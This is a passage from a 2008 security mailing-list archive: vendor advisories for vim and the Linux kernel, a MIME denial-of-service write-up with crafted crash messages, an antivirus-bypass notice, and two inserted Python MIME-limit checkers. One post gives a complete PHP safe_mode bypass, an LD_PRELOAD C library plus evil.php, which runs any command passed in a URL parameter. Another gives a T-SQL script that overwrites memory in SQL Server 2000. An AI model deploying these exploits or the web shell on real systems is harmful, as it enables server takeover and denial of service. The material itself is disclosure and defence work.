    strings where one string is a prefix of another string).

Inspection of the source code reveals that the parser of the courier-mta
allows only 300 MIME parts and a nesting depth of 30 levels. Since courier
seems not to get too many complaints, this is probably a reasonable limit.

== History of this bug ==

I (re)discovered the bug independently in mid 2007. The bug was however
known before. There are some advisories like secunia.com/advisories/11360/
(for Eudora, bug still unfixed) by people who discovered the problem
before, but did not publicly announce or did not see the scope of it. More
recently, there has been a similar advisory for sendmail, CVE-2006-1173.
There have been other advisories for different antivirus solutions. This
bug is not 0-day at all, it is really old. If you find older advisories
which cover this bug, or knew it before, mail me so I can update this
section.

== Credit ==

This bug was discovered by Bernhard 'Bruhns' Brehm at Recurity Labs.
Company page: http://www.recurity-labs.com
Email-address: bruhns@recurity-labs.com
Wiki for further problem discussion: http://mime.recurity.com

Thanks to FX, Fabs and joern for various help.

Cheers,
Bruhns
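
The bounded parse the post above recommends (courier's part-count and nesting-depth limits), as an added example in Python that is not part of the original post and not courier's code: the 300/30 limits and the flag names mirror what the post quotes from man 3 rfc2045, while the parser, the sample-message helpers and all other names are this example's own assumptions.

```python
import re

# Limits as the post quotes them for courier's rfc2045 parser (assumed here).
MAX_PARTS = 300
MAX_DEPTH = 30

# Flag names echo the rfc2045 man page quoted in the post; the values are ours.
ERR2COMPLEX = 1 << 0      # too many parts or nested too deeply
ERRBADBOUNDARY = 1 << 1   # one nested boundary string is a prefix of another

_CT_RE = re.compile(r"^content-type:\s*([^;\s]+)(.*)$", re.I)
_BOUNDARY_RE = re.compile(r'boundary\s*=\s*"?([^";\s]+)"?', re.I)


def split_message(text):
    """Return (content type, boundary or None, body) of one MIME entity.
    Header folding and other parameters are ignored: only structure matters here."""
    text = text.replace("\r\n", "\n")
    if text.startswith("\n"):             # entity without any header lines
        head, body = "", text[1:]
    elif "\n\n" in text:
        head, body = text.split("\n\n", 1)
    else:                                 # headers only, empty body
        head, body = text, ""
    ctype, boundary = "text/plain", None  # RFC 2045 default when the field is missing
    for line in head.split("\n"):
        m = _CT_RE.match(line)
        if m:
            ctype = m.group(1).lower()
            b = _BOUNDARY_RE.search(m.group(2))
            boundary = b.group(1) if b else None
    return ctype, boundary, body


def split_multipart(body, boundary, limit):
    """Split a multipart body on its "--boundary" lines up to "--boundary--".
    Stops once more than `limit` parts were seen: enough to reject, so the rest
    of a multikill-style body is never even sliced."""
    delim = "--" + boundary
    parts, current, inside = [], [], False
    for line in body.split("\n"):
        stripped = line.rstrip()
        is_open, is_close = stripped == delim, stripped == delim + "--"
        if is_open or is_close:
            if inside:
                parts.append("\n".join(current))
                if len(parts) > limit:
                    break
            if is_close:
                break
            current, inside = [], True
            continue
        if inside:
            current.append(line)
    return parts


def inspect(raw, max_parts=MAX_PARTS, max_depth=MAX_DEPTH):
    """Walk the MIME tree with an explicit stack (no recursion, so a nesty
    message cannot exhaust the checker's own call stack) and stop at the first
    violation.  Returns (parts seen, deepest level seen, violation flags)."""
    flags, parts, deepest = 0, 0, 0
    stack = [(raw, 1, ())]            # (entity text, depth, enclosing boundaries)
    while stack:
        text, depth, outer = stack.pop()
        parts += 1
        deepest = max(deepest, depth)
        if parts > max_parts or depth > max_depth:
            flags |= ERR2COMPLEX
            break                      # reject instead of finishing the walk
        ctype, boundary, body = split_message(text)
        if ctype == "message/rfc822":  # body is a whole message: one level deeper
            stack.append((body, depth + 1, outer))
        elif ctype.startswith("multipart/") and boundary:
            if any(o.startswith(boundary) or boundary.startswith(o) for o in outer):
                flags |= ERRBADBOUNDARY
            children = split_multipart(body, boundary, max_parts - parts)
            for child in reversed(children):
                stack.append((child, depth + 1, outer + (boundary,)))
    return parts, deepest, flags


# Constructed sample messages: miniatures of the ones shown in the post.
def example_message():
    """The well-formed multipart/mixed example from the post."""
    return ('Content-Type: multipart/mixed; boundary="n"\n\n'
            "--n\ncontent-type:text/plain\n\nthis is some plain text.\n"
            "--n\ncontent-type:message/rfc822\n\nFrom: <bruhns@hell>;\n"
            "Subject: example 2\n\nThis is not a MIME-mail.\n--n--\n")

def nesty(levels):
    """`levels` message/rfc822 headers, each wrapping the next (no MIME-Version)."""
    return "Content-type: message/rfc822;\n\n" * levels

def multikill(count):
    """One multipart/mixed body with `count` one-line parts."""
    return 'Content-Type: multipart/mixed; boundary="n"\n\n' + "--n\n\nb\n" * count + "--n--\n"

def ambiguous_boundaries():
    """Inner boundary "nn" has the outer boundary "n" as a prefix."""
    inner = 'Content-Type: multipart/mixed; boundary="nn"\n\n--nn\n\nx\n--nn--\n'
    return 'Content-Type: multipart/mixed; boundary="n"\n\n--n\n' + inner + "--n--\n"
```

inspect(example_message()) returns (4, 3, 0), while nesty(40) and multikill(500) come back with ERR2COMPLEX set after 31 and 301 parts respectively, and ambiguous_boundaries() with ERRBADBOUNDARY.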



From - Tue Dec  9 11:09:50 2008
To: bugtraq@securityfocus.com
Subject: [ MDVSA-2008:236-1 ] vim
Date: Mon, 08 Dec 2008 19:38:00 -0700
From: security@mandriva.com
Message-Id: <E1L9sU5-0002I7-1H@titan.mandriva.com>



 _______________________________________________________________________

 Mandriva Linux Security Advisory                       MDVSA-2008:236-1
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : vim
 Date    : December 8, 2008
 Affected: 2008.0, 2008.1, 2009.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 Several vulnerabilities were found in the vim editor:
 
 A number of input sanitization flaws were found in various vim
 system functions.  If a user were to open a specially crafted file,
 it would be possible to execute arbitrary code as the user running vim
 (CVE-2008-2712).
 
 Ulf Härnhammar of Secunia Research found a format string flaw in
 vim's help tags processor.  If a user were tricked into executing the
 helptags command on malicious data, it could result in the execution
 of arbitrary code as the user running vim (CVE-2008-2953).
 
 A flaw was found in how tar.vim handled TAR archive browsing.  If a
 user were to open a special TAR archive using the plugin, it could
 result in the execution of arbitrary code as the user running vim
 (CVE-2008-3074).
 
 A flaw was found in how zip.vim handled ZIP archive browsing.  If a
 user were to open a special ZIP archive using the plugin, it could
 result in the execution of arbitrary code as the user running vim
 (CVE-2008-3075).
 
 A number of security flaws were found in netrw.vim, the vim plugin
 that provides the ability to read and write files over the network.
 If a user opened a specially crafted file or directory with the netrw
 plugin, it could result in the execution of arbitrary code as the
 user running vim (CVE-2008-3076).
 
 A number of input validation flaws were found in vim's keyword and
 tag handling.  If vim looked up a document's maliciously crafted
 tag or keyword, it was possible to execute arbitrary code as the user
 running vim (CVE-2008-4101).
 
 A vulnerability was found in certain versions of netrw.vim where it
 would send FTP credentials stored for an FTP session to subsequent
 FTP sessions to servers on different hosts, exposing FTP credentials
 to remote hosts (CVE-2008-4677).
 
 This update provides vim 7.2 (patchlevel 65) which corrects all of
 these issues and introduces a number of new features and bug fixes.

 Update:

 The previous vim update incorrectly introduced a requirement on
 libruby and also conflicted with a file from the git-core package
 (in contribs).  These issues have been corrected with these updated
 packages.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2712
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2953
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3074
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3075
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3076
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4101
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4677
 _______________________________________________________________________

 Updated Packages:

 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

From - Tue Dec  9 11:19:50 2008
Date: 9 Dec 2008 07:52:55 -0000
Message-ID: <20081209075255.17173.qmail@securityfocus.com>
From: gat3way@gat3way.eu
To: bugtraq@securityfocus.com
Subject: PHP safe_mode can be bypassed via proc_open() and custom environment.

This *should* work provided that you have met the following requirements:

1) A writable directory under documentroot to place those files (obviously)
2) You don't have proc_open in your disabled_functions list
3) You are able to compile a shared library on the same platform as the target web server.


Here is the library code, compile with cc -o a.so -fPIC -shared a.c

a.c:
----

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* write() */

/* Overrides getuid(), as described below: reads a command line from .comm,
   runs it and leaves its output in .comm1 for the PHP script to read back. */
int getuid()
{
    char *buf = malloc(300);
    FILE *a;

    unsetenv("LD_PRELOAD");
    a = fopen(".comm", "r");
    buf = fgets(buf, 100, a);
    write(2, buf, strlen(buf));
    fclose(a);
    rename("a.so", "b.so");
    system(buf);
    system("mv output.txt .comm1");
    rename("b.so", "a.so");
    free(buf);
    return 0;
}

*cut*


And that is the PHP script:

evil.php:
-------------------------
<?php

$path="/var/www"; //change to your writable path


$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);

$descriptorspec = array(
 0 => array("pipe", "r"),
 1 => array("file", $path."/output.txt","w"),
 2 => array("file", $path."/errors.txt", "a" )
);

$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('examplecommand', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed


sleep(1);
$a=fopen($path."/.comm1","r");

echo "<pre><b>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";

?>


Why does that work?
-------------------

Because the PHP devs like to trust the environment. Especially the dynamic loader variables. 

If you have safe_mode enabled, you cannot execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash to your command string and strip "..". Yet, proc_open() enables you to provide your own environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and even though "yourcommand" is invalid, the LD_PRELOAD variable is passed to /bin/sh.

Then /bin/sh loads your "evil" library and then you can easily execute other commands, open files, etc, etc.


The library in question overloads getuid() in a way that it takes input from a text file, executes it and writes the output into another text file. 

This also works against open_basedir restrictions since the library can be under the documentroot.

The only tough thing from an attacker's perspective is to compile the library on the same platform as the attacked system.

And it works on Linux only.

From - Tue Dec  9 11:29:50 2008
Subject: SEC Consult SA-20081109-0 :: Microsoft SQL Server 2000
sp_replwritetovarbin limited memory overwrite vulnerability
From: Bernhard Mueller <research@sec-consult.com>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
Bugtraq <bugtraq@securityfocus.com>
Date: Tue, 9 Dec 2008 13:16:34 +0100
Message-ID: <1228824994.7036.8.camel@b4byl0n>

SEC Consult Security Advisory < 20081209-0 >
====================================================================================
                  title: Microsoft SQL Server 2000 sp_replwritetovarbin
                         limited memory overwrite vulnerability
                program: Microsoft SQL Server 2000
     vulnerable version: <=8.00.2039
               homepage: www.microsoft.com
                  found: 04-12-2008
                     by: Bernhard Mueller (SEC Consult Vulnerability Lab)
             perm. link: http://www.sec-consult.com/files/20081209_mssql-2000-sp_replwritetovarbin_memwrite.txt
====================================================================================
Product description:
--------------------

Microsoft SQL Server is a relational database management system (RDBMS)
produced by Microsoft. Its primary query language is Transact-SQL, an
implementation of the ANSI/ISO standard Structured Query Language (SQL)
used by both Microsoft and Sybase.


Vulnerability overview:
----------------------

By calling the extended stored procedure sp_replwritetovarbin, and
supplying several uninitialized variables as parameters, it is possible
to trigger a memory write to a controlled location. Depending on the
underlying Windows version, it is / may be possible to use this
vulnerability to execute arbitrary code in the context of the vulnerable
SQL server process.
In a default configuration, the sp_replwritetovarbin stored procedure is
accessible by anyone. The vulnerability can be exploited by an
authenticated user with a direct database connection, or via SQL
injection in a vulnerable web application.


Vulnerability details:
----------------------

The following T-SQL script can be used to test for the vulnerability:


--------------------------------
DECLARE @buf NVARCHAR(4000),
@val NVARCHAR(4),
@counter INT

SET @buf = '
declare @retcode int,
@end_offset int,
@vb_buffer varbinary,
@vb_bufferlen int,
@buf nvarchar;
exec master.dbo.sp_replwritetovarbin 1,
  @end_offset output,
  @vb_buffer output,
  @vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0
WHILE @counter < 3000
BEGIN
  SET @counter = @counter + 1
  SET @buf = @buf + @val
END

SET @buf = @buf + ''',''1'',''1'',''1'',
''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf
--------------------------------


This triggers an access violation exception (write to address
0x41414141).
The vulnerability has been successfully used to execute arbitrary code
on a lab machine.
SEC Consult will not release code execution exploits for this
vulnerability to the public.


Workaround:
-----------

Remove the sp_replwritetovarbin extended stored procedure. Run the
following as an administrator:

execute dbo.sp_dropextendedproc 'sp_replwritetovarbin'

See also:

"Removing an Extended Stored Procedure from SQL Server"
http://msdn.microsoft.com/en-us/library/aa215995(SQL.80).aspx


Patch:
------

According to an email received by Microsoft in September, a fix for this
vulnerability has been completed.
The release schedule for this fix is currently unknown.


Vendor timeline:
---------------
Vendor notified: 2008-04-17
Vendor response: 2008-04-17
Last response from Microsoft: 09-29-2008
Request for update status 1: 10-14-2008
Request for update status 2: 10-29-2008
Request for update status 3: 11-12-2008
Request for update status 4
and prenotification about advisory release date: 11-28-2008
Public release: 11-09-2008

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH

Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com

EOF Bernhard Mueller / @2008


From - Tue Dec  9 12:09:50 2008
Date: Tue, 09 Dec 2008 11:21:52 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com, update-announce@lists.rpath.com,
    product-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
    bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2008-0332-1 kernel
Message-ID: <493e9b20.6LGwMhogBQbBn1pq%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0332-1
Published: 2008-12-09
Products:
    rPath Appliance Platform Linux Service 1
    rPath Appliance Platform Linux Service 2
    rPath Linux 1
    rPath Linux 2

Rating: Major
Exposure Level Classification:
    Local User Non-deterministic Privilege Escalation
Updated Versions:
    kernel=conary.rpath.com@rpl:1-vmware/2.6.26.8-0.2-1
    kernel=conary.rpath.com@rpl:1/2.6.26.8-0.2-1
    kernel=conary.rpath.com@rpl:2/2.6.26.8-2-0.1
    kernel=rap.rpath.com@rpath:linux-1/2.6.26.8-2-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2915

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5182
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5300

Description:
    Previous versions of the kernel package contain multiple
    vulnerabilities.  The inotify functionality may allow local
    users to gain privileges via unknown vectors related to race
    conditions in inotify watch removal and umount.  Additionally,
    there are two denial-of-service vulnerabilities, including one
    in which a local user may cause a "soft" system lock-up.
    
    This update requires a system reboot to implement the fixes.

http://wiki.rpath.com/Advisories:rPSA-2008-0332

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Tue Dec  9 12:29:50 2008
Date: Tue, 9 Dec 2008 19:53:27 +0300
From: "Vladimir '3APA3A' Dubrovin" <3APA3A@SECURITY.NNOV.RU>
Organization: http://www.security.nnov.ru
To: bruhns@recurity-labs.com
Cc: bugtraq@securityfocus.com
Subject: Re: DoS attacks on MIME-capable software via complex MIME emails
Message-ID: <617903480.20081209195327@SECURITY.NNOV.RU>
In-Reply-To: <20081208225217.10144.qmail@securityfocus.com>

Dear bruhns@recurity-labs.com,

The idea is not new. The same vulnerability was reported for Agnitum Outpost by
Alexander Andrusenko in 2004, http://securityvulns.com/news3687.html

Also, the same vulnerabilities were reported and fixed in Sendmail
(CVE-2006-1173).

--Tuesday, December 9, 2008, 1:52:17 AM, you wrote to bugtraq@securityfocus.com:

brlc> == DoS attacks on MIME-capable software via complex MIME emails ==
brlc> == Preface ==
brlc> On the phneutral 0x7d8 and RSS 08, I gave short talks on a widely unregarded
brlc> problem with MIME software. Due to popular demand, I decided to publish a
brlc> short writeup of the talk.

brlc> == What is MIME? ==
brlc> MIME is the standard format for email-messages. One could say, MIME is for
brlc> email, what html is for the web. The first RFC for MIME was published in
brlc> 1992, RFC 1341. The current standard is specified in RFC 2045 from 1996.
brlc> MIME is a recursive data format. MIME objects consist of a header and a
brlc> body, where the content-type field of the header specifies the type of the
brlc> body. The body can consist of several separated MIME-objects, a single
brlc> MIME-object, a block of text, an encoded image or about anything specified
brlc> in the header. It is possible to read some real-world examples by opening
brlc> some emails and hitting "show source".

brlc> == Two examples to illustrate MIME ==
brlc> The first example is the content-type:message/rfc822, which is intended for
brlc> forwarding emails. The following body is a complete email, which starts
brlc> again with a header, followed by a body. The second example is the
brlc> content-type:multipart/mixed. A pretty much self-explanatory example is
brlc> provided below. The parts of the body are separated by strcat("--",
brlc> boundary) and the body must be ended by strcat("--", boundary, "--").

brlc> From: <bruhns@hell>
brlc> To: <foo@bar>
brlc> Subject: example
brlc> MIME-Version: 1.0
brlc> Content-Type: multipart/mixed; boundary="n"

brlc> --n
brlc> content-type:text/plain

brlc> this is some plain text.
brlc> --n
brlc> content-type:message/rfc822

brlc> From: <bruhns@hell>;
brlc> Subject: example 2

brlc> This is not a MIME-mail, since the mime-version field is missing! However,
brlc> most software does not care.
brlc> --n--

brlc> == The problem ==
brlc> Even though MIME is pretty old, many people have not yet learned how to
brlc> parse MIME correctly. The problem is that the number of MIME-parts of an
brlc> email and the depth of recursion is potentially unlimited. Some software
brlc> like the popular rfc2045 library of the courier-mta solve this problem by
brlc> discarding mails with too many MIME-parts as a Denial of Service attack.
brlc> This is probably the best approach to handle this problem.

brlc> == Proof-of-Concept: Nesty ==
brlc> The nesty attack abuses the message/rfc822 type. The following example
brlc> crashes a lot of software, which tries to parse it recursively and
brlc> therefore overflows its stack:

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> Content-type: message/rfc822;

brlc> ... about 200kb. Note that this mail is not compliant to the rfc2045, since
brlc> the mime-version field is missing. However, most software does not care and
brlc> a lot of it chokes on this mail. In order to attack more rfc-abiding
brlc> software (mostly open-source), one can easily adapt the nesty mail to be
brlc> compliant. This however increases the size of the mail considerably, which
brlc> somehow takes away the elegance of crashing a server with only 200kb.


brlc> == Proof-of-Concept: Multikill ==
brlc> The multikill attack abuses the multipart/mixed type by creating an overly
brlc> large number of MIME-parts. Multipart/mixed could be used in a recursive
brlc> way, but this is not even needed for this attack. A lot of software freezes
brlc> upon the following example:

brlc> From: <bruhns@hell>
brlc> To: <foo@bar>
brlc> Subject: multikill
brlc> MIME-Version: 1.0
brlc> Content-Type: multipart/mixed; boundary="n"


brlc> --n

brlc> b

brlc> --n

brlc> ... about 800kb or 70000 parts. For a lot of software, about 216 seems to
brlc> be the barrier, so you can't craft much more compact multikill attacks.

brlc> --n

brlc> b

brlc> --n--

brlc> == Impact ==
brlc> Firstly, the attack is DoS only. At this point it seems rather unlikely,
brlc> that command execution can be crafted on the basis of this problem.
brlc> However, the DoS vulnerability exposed by these proof-of-concept mails is
brlc> shared by many systems by different vendors and is trivial to exploit. The
brlc> ramifications of this attack are therefore not really known yet. There is
brlc> still much testing to do.

brlc> And at last, there does not only exist a problem with emails with too many
brlc> MIME parts, but there exists a whole problem class and a whole class of
brlc> attacks, which are insufficiently researched and regarded by now. Of these
brlc> attacks, DoS via malformed MIME emails, the nesty and multikill mails are
brlc> only the first examples, the tip of the iceberg, so to say; once software
brlc> has been patched to correctly handle these emails, other people will come
brlc> up with other examples of malformed emails. To look at this attack even
brlc> more broadly, the topic of DoS attacks via overly complex instances of
brlc> recursive data types is not researched sufficiently.

brlc> == Effects on Outlook Express ==
brlc> Outlook freezes on the multikill mail. Outlook starts parsing emails while
brlc> downloading them. Upon parsing a multikill mail with more than about 216
brlc> parts, some library function goes into an endless loop. Outlook never
brlc> finishes downloading the multikill mail, it stays in the mailbox. Outlook
brlc> never closes the connection to the mail server, which is not nice to the
brlc> mailserver. Outlook can only be stopped by killing the process from the
brlc> task manager.

brlc> To be more exact, the bug seems to reside in InetComm.dll in the
brlc> MimeOleClearDirtyTree function. I would guess at a short-integer overflow,
brlc> which results in the infinite loop.

brlc> Microsoft was informed on 29.07.08 and declined to comment on this issue.

brlc> == Effects on Virusscanners ==
brlc> NOD32 takes several minutes of kerneltime to scan the multikill mails. ESET
brlc> did not comment on this issue and was informed on 01.08.08.
brlc> Kaspersky Internet Security Suite takes several minutes to scan the
brlc> multikill mail. Kaspersky was informed on 29.07.08, confirmed the issue and
brlc> promised to fix the problem.
brlc> Norton Antivirus takes several minutes to scan the multikill mails. Norton
brlc> was informed on 01.08.08 and answered promptly and politely.
brlc> Norton promised not to fix the problem, since it would not qualify as a
brlc> Denial of Service vulnerability.


brlc> == Specific Software ==
brlc> Vulnerable:
brlc> Microsoft Outlook Express 6, Version 6.00.2900.5512
brlc> Opera Version: 9.51 Build: 10081 System: Windows XP
brlc> Incredimail Build ID: 5853710 Setup ID: 7 Pn: 92977368
brlc> Norton Internet Security Version 15.5.0.23
brlc> ESet NOD32 2.70.0039.0000
brlc> Kaspersky Internet Security 2009; Databases from 23.07.2008

brlc> Slightly affected:
brlc> Mozilla Thunderbird Version 2.0.14 (20080421)

brlc> Not vulnerable:
brlc> Avira Antivir Search engine: v8.01.01.11, 17.07.2008
brlc> Mutt
brlc> Courier

brlc> == Correct handling of overly complex messages ==
brlc> There exist examples of software which excellently handle overly complex
brlc> MIME-mails. One is the rfc2045 -library of the courier-mta. Quote from the
brlc> man 3 rfc2045:

brlc> The rfcviolation field in the top-level rfc2045 indicates any errors found
brlc> while parsing the MIME message.
brlc>  rfcviolation is a bitmask of the following flags:

brlc> [...]
brlc> RFC2045_ERR2COMPLEX
brlc>     The message has too many MIME sections, this is a potential
brlc> denial-of-service attack.
brlc> RFC2045_ERRBADBOUNDARY
brlc>     Ambiguous nested multipart MIME boundary strings. (Nested MIME boundary
brlc> strings where one string is a prefix of another string).

brlc> Inspection of the source code reveals, that the parser of the courier-mta
brlc> allows only 300 mime parts and a nesting depth of 30 levels. Since courier
brlc> seems not to get too many complaints, this is probably a reasonable limit.

brlc> == History of this bug ==
brlc> I (re)discovered the bug independently in mid 2007. The bug was however
brlc> known before. There are some advisories like secunia.com/advisories/11360/
brlc> (for Eudora, bug still unfixed) by people who discovered the problem
brlc> before, but did not publicly announce or did not see the scope of it. More
brlc> recently, there has been a likewise advisory for sendmail, CVE-2006-1173.
brlc> There have been other advisories for different antivirus solutions. This
brlc> bug is not 0-day at all, it is really old. If you find older advisories,
brlc> which cover this bug, or knew it before, mail me so I can update this
brlc> section.

brlc> == Credit ==
brlc> This bug was discovered by Bernhard 'Bruhns' Brehm at Recurity Labs.
brlc> Company page: http://www.recurity-labs.com
brlc> Email-address: bruhns@recurity-labs.com
brlc> Wiki for further problem discussion: http://mime.recurity.com

brlc> Thanks to FX, Fabs and joern for various help.

brlc> Cheers,
brlc> Bruhns




-- 
~/ZARAZA http://securityvulns.com/

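The part-count and nesting-depth limits that the quoted post attributes to courier's rfc2045 library (300 parts, 30 levels) are cheap to enforce before a parser recurses at all. The Python below is an added example, not code from the post, from courier or from any product named in the thread: it walks a raw message with an explicit stack instead of recursion, stops at the first part that breaks either limit, and is fed constructed messages shaped like the nesty and multikill proofs of concept. The sample addresses, the exact header layout and the default limits are assumptions taken from the post's description.

```python
"""Bounded MIME-complexity check (added example; limits taken from the post)."""
import re

MAX_PARTS = 300   # part-count limit the post attributes to courier's rfc2045
MAX_DEPTH = 30    # nesting-depth limit from the same source


class TooComplex(ValueError):
    """Raised as soon as a limit is exceeded, before the walk goes any deeper."""


# A message that begins with a blank line has empty headers; otherwise the
# first blank line ends the header block.
_HEADER_END = re.compile(rb"\A\r?\n|\r?\n\r?\n")
_CONTENT_TYPE = re.compile(rb"^content-type:[ \t]*([^;\s]+)(.*)$", re.I | re.M)
_BOUNDARY = re.compile(rb'boundary=("?)([^";\s]+)\1', re.I)


def _split(raw):
    """Return (headers, body); a message without a blank line has no body."""
    m = _HEADER_END.search(raw)
    return (raw, b"") if m is None else (raw[: m.start()], raw[m.end():])


def _content_type(headers):
    m = _CONTENT_TYPE.search(headers)
    return (b"text/plain", b"") if m is None else (m.group(1).lower(), m.group(2))


def _children(body, boundary):
    """Split a multipart body on its "--boundary" / "--boundary--" lines."""
    delim, closing = b"--" + boundary, b"--" + boundary + b"--"
    parts, current, inside = [], [], False
    for line in body.splitlines(keepends=True):
        marker = line.rstrip(b"\r\n")
        if marker == closing:
            if inside:
                parts.append(b"".join(current))
            break
        if marker == delim:
            if inside:
                parts.append(b"".join(current))
            current, inside = [], True
        elif inside:
            current.append(line)
    return parts


def check_complexity(raw, max_parts=MAX_PARTS, max_depth=MAX_DEPTH):
    """Walk the MIME tree with an explicit stack (no recursion, so a deeply
    nested message cannot exhaust the interpreter stack) and raise on the
    first part that breaks a limit.  Returns (part_count, deepest_level)."""
    parts, deepest, stack = 0, 0, [(raw, 0)]
    while stack:
        msg, depth = stack.pop()
        parts += 1
        deepest = max(deepest, depth)
        if parts > max_parts:
            raise TooComplex(f"more than {max_parts} MIME parts")
        if depth > max_depth:
            raise TooComplex(f"nesting deeper than {max_depth} levels")
        headers, body = _split(msg)
        ctype, params = _content_type(headers)
        if ctype == b"message/rfc822":
            stack.append((body, depth + 1))        # the body is itself a message
        elif ctype.startswith(b"multipart/"):
            m = _BOUNDARY.search(params)
            if m is not None:                       # no boundary: body is opaque
                for child in _children(body, m.group(2)):
                    stack.append((child, depth + 1))
    return parts, deepest


def is_too_complex(raw):
    try:
        check_complexity(raw)
    except TooComplex:
        return True
    return False


# Constructed samples shaped like the post's two proofs of concept.
def nesty(levels):
    return b"Content-type: message/rfc822;\n\n" * levels


def multikill(n):
    head = (b"From: <a@example.invalid>\nTo: <b@example.invalid>\nSubject: multikill\n"
            b"MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary=\"n\"\n\n")
    return head + b"--n\n\nb\n\n" * n + b"--n--\n"


BENIGN = (b"From: <a@example.invalid>\nTo: <b@example.invalid>\nSubject: example\n"
          b"MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary=\"n\"\n\n"
          b"--n\ncontent-type:text/plain\n\nthis is some plain text.\n"
          b"--n\ncontent-type:message/rfc822\n\nFrom: <a@example.invalid>\n"
          b"Subject: example 2\n\nforwarded body\n--n--\n")

if __name__ == "__main__":
    print("benign:", check_complexity(BENIGN))
    for name, sample in (("nesty", nesty(6000)), ("multikill", multikill(70000))):
        print(name, "rejected" if is_too_complex(sample) else "accepted")
```

The walk counts every part as it is popped, so a 70000-part multikill is refused after the 301st part and a 200 KB nesty after 31 levels, without ever holding more than one level's worth of state on the call stack.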
From - Tue Dec  9 13:39:51 2008
Date: 9 Dec 2008 16:34:48 -0000
From: xhakerman2006@yahoo.com
To: bugtraq@securityfocus.com
Subject: Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass -Update-
Message-ID: <20081209163448.29820.qmail@securityfocus.com>

Little update.
In the previous advisory there were some wrong reports because of the update of the anti-virus product versions.
********************************************************************************************
Multiple Vendor Anti-Virus Software Malicious WebPage Detection Bypass
           [_] Discovered by: DATA_SNIPER
           [_] Greets to: hacker c&c Team, Arab4Services team on www.arab4services.net, AT4RE Team on www.at4re.com
           [_] Special thanks go to: Andrey Bayora and all Arabian hackers, especially Algerian hackers.
NOTIFICATION:
This exploit is based on Andrey Bayora's "magic of magic byte" but with some development.
This proof of concept was created for educational purposes only. Use the code at your own risk.
The author will not be responsible for any damages.
*********************************************************************************************
Exploit Information:
    Date: 2008/19/08
    Impact: Bypassing the detection of a malicious web page that can compromise a user's system
Vulnerable AV software:
   ESET Smart Security Latest Version<=(the Exploit was dedicated for it)
   AhnLab-V3 2008.12.4.1
   AntiVir 7.9.0.36 2008.12.04
   Avast 4.8.1281.0
   CAT-QuickHeal 10.00
   ClamAV 0.94.1
   DrWeb 4.44.0.09170
   Ewido 4.0
   Ikarus T3.1.1.45.0
   K7AntiVirus 7.10.541
   NOD32 3662
   Norman 5.80.02
   Panda 9.0.0.4
   Prevx1 V2
   Rising 21.06.31.00
   SecureWeb-Gateway
   Sunbelt 3.1.1832.2
   TheHacker 6.3.1.2.174
   TrendMicro 8.700.0.1004
   ViRobot  2008.12.4.1499
The thing that must be considered is that the PoC varies from exploit to exploit (sometimes
Kaspersky and the other famous AV software can be deceived).
Proof of Concept:
As I said, the exploit is based on the "magic of magic byte" method: we first add the MZ header to the HTML exploit and change the extension to txt or jpg or no extension. The exploit is compatible with IE6 and IE7 because IE6 and IE7 execute the HTML even if it is in a txt file or a file with no extension,
so the exploit works in cooperation with IE6 and IE7 :).
VirusTotal result for the MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit:
http://www.virustotal.com/analisis/2fce2b49876e27b4144fd39be466200e
and screenshots of the scan in VirusTotal:
http://members.lycos.co.uk/datasniper/a.jpg
http://members.lycos.co.uk/datasniper/b.jpg
http://members.lycos.co.uk/datasniper/c.jpg
POC:
